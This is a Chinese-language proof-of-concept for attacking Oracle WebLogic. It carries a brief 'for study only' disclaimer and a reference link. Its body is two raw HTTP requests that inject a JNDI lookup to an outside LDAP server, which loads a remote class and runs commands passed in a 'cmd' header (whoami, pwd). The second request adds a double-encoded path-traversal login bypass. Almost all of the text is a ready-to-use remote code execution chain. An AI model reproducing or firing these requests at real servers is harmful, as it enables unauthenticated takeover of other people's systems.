僅供本地代碼學習,用於非法目的與本人無關
核心POC
POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.122;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1
Host: 192.168.122.9:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
cmd:whoami
Cookie: ADMINCONSOLESESSION=8xUkHS93pNBdw9iRlb1XOoH5Iy5qm65NmKad54eCEtDI2PErEIXy!-181493417
Connection: close
配合未授權訪問后台
POST /console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.122;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1
Host: 192.168.122.9:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
cmd:pwd
Cookie: ADMINCONSOLESESSION=8xUkHS93pNBdw9iRlb1XOoH5Iy5qm65NmKad54eCEtDI2PErEIXy!-181493417
Connection: close
原理參考
https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw
